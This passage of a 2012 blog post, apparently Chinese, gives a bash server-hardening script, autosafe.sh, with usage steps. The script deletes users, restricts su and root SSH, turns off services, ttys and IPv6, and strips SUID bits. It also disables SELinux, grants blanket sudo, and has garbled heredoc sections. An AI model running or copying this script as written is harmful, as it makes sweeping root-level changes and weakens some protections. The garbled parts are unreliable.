yppasswdd ypserv yum-updatesd tog-pegasus” V_TTY=”3|4|5|6″ V_TTY6=”1-2″ V_SUID=( ‘/usr/bin/chage’ ‘/usr/bin/gpasswd’ ‘/usr/bin/wall’ ‘/usr/bin/chfn’ ‘/usr/bin/chsh’ ‘/usr/bin/newgrp’ ‘/usr/bin/write’ ‘/usr/sbin/usernetctl’ ‘/bin/traceroute’ ‘/bin/mount’ ‘/bin/umount’ ‘/sbin/netreport’ ) linuxvar=`cat /etc/issue.net |head -n1` linuxvar=${linuxvar#*release} linuxvar=${linuxvar:1:1} version=1.2 safe_deluser(){ echo “delete user …” for i in $V_DELUSER ;do echo “deleting $i”; userdel $i ; done } safe_delgroup(){ echo “delete group …” for i in $V_DELGROUP ;do echo “deleting $i”; groupdel $i; done } safe_password(){ echo “change password limit …” echo “/etc/login.defs” echo “PASS_MIN_LEN $V_PASSMINLEN” sed -i “/^PASS_MIN_LEN/s/5/$V_PASSMINLEN/” /etc/login.defs } safe_history(){ echo “change history limit …” echo “/etc/profile” echo “HISTSIZE $V_HISTSIZE” sed -i “/^HISTSIZE/s/1000/$V_HISTSIZE/” /etc/profile } safe_logintimeout(){ echo “change login timeout …” echo “/etc/profile” echo “TMOUT=$V_TMOUT” sed -i “/^HISTSIZE/a\TMOUT=$V_TMOUT” /etc/profile } safe_bashhistory(){ echo “denied bashhistory …” echo “/etc/skel/.bash_logout” echo ‘rm -f $HOME/.bash_history’ if egrep “bash_history” /etc/skel/.bash_logout > /dev/null then echo ‘warning:existed’ else echo ‘rm -f $HOME/.bash_history’ >> /etc/skel/.bash_logout fi } safe_addgroup(){ echo “groupadd $V_GROUPNAME …” groupadd $V_GROUPNAME } safe_sugroup(){ echo “permit $V_GROUPNAME use su …” echo “/etc/pam.d/su” echo “auth sufficient pam_rootok.so debug” echo “auth required pam_wheel.so group=$V_GROUPNAME” echo “gpasswd -a $WORKUSER $V_GROUPNAME” if egrep “auth required pam_wheel.so” /etc/pam.d/su > /dev/null then echo ‘warning:existed’ else sed -i “/^#%PAM/a\auth required pam_wheel.so group=${V_GROUPNAME}” /etc/pam.d/su sed -i “/^#%PAM/a\auth sufficient pam_rootok.so debug” /etc/pam.d/su gpasswd -a $WORKUSER $V_GROUPNAME fi } safe_sudoer(){ echo “permit $WORKUSER use sudo …” echo “/etc/sudoers” echo “$WORKUSER ALL=(ALL) ALL” if [ -n $WORKUSER ] then if egrep “$WORKUSER” /etc/sudoers > /dev/null then echo “warning:existed! ” else echo “$WORKUSER ALL=(ALL) ALL” >> /etc/sudoers echo ‘export PATH=$PATH:/sbin:/usr/sbin’ >> /etc/bashrc echo ‘export LDFLAGS=”-L/usr/local/lib -Wl,-rpath,/usr/local/lib”‘ >> /etc/bashrc echo ‘export LD_LIBRARY_PATH=”/usr/local/lib”‘ >> /etc/bashrc fi else echo “warning:skip! ” fi } safe_denyrootssh(){ echo “denied root login …” echo “/etc/ssh/sshd_config” echo “PermitRootLogin no” sed -i ‘/^#PermitRootLogin/s/#PermitRootLogin yes/PermitRootLogin no/’ /etc/ssh/sshd_config } safe_changesshport(){ echo “change ssh port …” echo “/etc/ssh/sshd_config” echo “Port $SSHPORT” if egrep “Port $SSHPORT” /etc/ssh/sshd_config > /dev/null then echo “warning:existed! ” else echo “Port $SSHPORT” >> “/etc/ssh/sshd_config” fi } safe_stopservice(){ echo “stop services …” for i in $V_SERVICE ;do service $i stop; done } safe_closeservice(){ echo “close services autostart …” for i in $V_SERVICE ;do chkconfig $i off; done } safe_closeservicewhite(){ echo “close services autostart …” for i in `ls /etc/rc3.d/S*` do CURSRV=`echo $i|cut -c 15-` echo $CURSRV case $CURSRV in crond | irqbalance | microcode_ctl | network | sshd | syslog | rsyslog | snmpd | fail2ban | ntpd | lvm2-monitor | iptables | auditd | kdump | sysstat | memcached | smartd | nagios | local | sphinx ) ;; *) echo “change $CURSRV to off” chkconfig –level 235 $CURSRV off service $CURSRV stop ;; esac done } safe_tty(){ echo “close tty …” if [ ${linuxvar} == 6 ]; then echo “/etc/init/start-ttys.conf” echo “/etc/sysconfig/init” echo “ACTIVE_CONSOLES=/dev/tty[${V_TTY6}]” echo “init q” #close tty #initctl stop tty TTY=/dev/tty6 sed -i “/^env ACTIVE_CONSOLES/s/\[1-6\]/\[${V_TTY6}\]/” /etc/init/start-ttys.conf sed -i “/^ACTIVE_CONSOLES/s/\[1-6\]/\[1-2\]/” /etc/sysconfig/init else echo “/etc/inittab” echo “#3:2345:respawn:/sbin/mingetty tty3” echo “#4:2345:respawn:/sbin/mingetty tty4” echo “#5:2345:respawn:/sbin/mingetty tty5” echo “#6:2345:respawn:/sbin/mingetty tty6” sed -i “/^[${V_TTY}]:2345/s/^/#/” /etc/inittab echo “init q” fi init q } safe_ctrlaltdel(){ echo “close ctrl+alt+del to restart server …” if [ ${linuxvar} == 6 ]; then echo “/etc/init/control-alt-delete.conf” echo ‘#exec /sbin/shutdown -r now “Control-Alt-Delete pressed”‘ echo “init q” sed -i ‘/^exec/s/^/#/’ /etc/init/control-alt-delete.conf else echo “/etc/inittab” echo “#ca::ctrlaltdel:/sbin/shutdown -t3 -r now” echo “init q” sed -i ‘/^ca::/s/^/#/’ /etc/inittab fi init q } safe_ipv6(){ echo “close ipv6 …” if [ ${linuxvar} == 6 ]; then echo ‘”alias net-pf-10 off” >> /etc/modprobe.d/ipv6.conf’ echo ‘”options ipv6 disable=1″ >> /etc/modprobe.d/ipv6.conf’ cat > /etc/modprobe.d/ipv6.conf > /etc/modprobe.conf’ echo ‘”alias ipv6 off” >> /etc/modprobe.conf’ if egrep “alias net-pf-10 off” /etc/modprobe.conf > /dev/null then echo “warning:existed! ” else echo “alias net-pf-10 off” >> /etc/modprobe.conf echo “alias ipv6 off” >> /etc/modprobe.conf fi fi echo ‘/sbin/chkconfig ip6tables off’ echo ‘”NETWORKING_IPV6=no” >> /etc/sysconfig/network’ /sbin/chkconfig –level 35 ip6tables off if egrep “NETWORKING_IPV6=no” /etc/sysconfig/network > /dev/null then echo “warning:existed! ” else echo “NETWORKING_IPV6=no” >> /etc/sysconfig/network fi } safe_selinux(){ echo “disable selinux …” echo “sed -i ‘/SELINUX/s/enforcing/disabled/’ /etc/selinux/config ” sed -i ‘/SELINUX/s/enforcing/disabled/’ /etc/selinux/config echo “selinux is disabled,you must reboot!” } safe_vim(){ echo “edit vim …” echo “alias vi=’vim'” sed -i “8 s/^/alias vi=’vim’/” /root/.bashrc cat >/root/.vimrc” echo “” echo ” deluser delete user” echo ” delgroup delete group” echo ” password change password limit” echo ” history change history limit” echo ” logintimeout change login timeout” echo ” bashhistory denied bashhistory” echo ” addgroup groupadd $V_GROUPNAME” echo ” sugroup permit $V_GROUPNAME use su” echo ” denyrootssh denied root login” echo ” stopservice stop services use black list” echo ” closeservice close services use black list” echo ” closeservicewhite close & stop services use white list” echo ” tty close tty” echo ” ctrlaltdel close ctrl+alt+del” echo ” ipv6 close ipv6″ echo ” selinux disabled selinux” echo ” vim edit vim” echo ” lockfile lock user&services” echo ” unlockfile unlock user&services” echo ” chmodinit init script only for root” echo ” chmodcommand remove SUID” echo ” version ” echo “” ;; esac

设置权限

chmod u+x ./autosafe.sh

运行脚本

./autosafe.sh deluser ./autosafe.sh delgroup …..

猛击下载脚本 autosafe1.2.sh

其它参考 linux基本安全配置手册 iptables 默认安全规则脚本

Posted in shell.

Tagged with , , .

rev="post-1356" No comments

By C1G 2012/03/30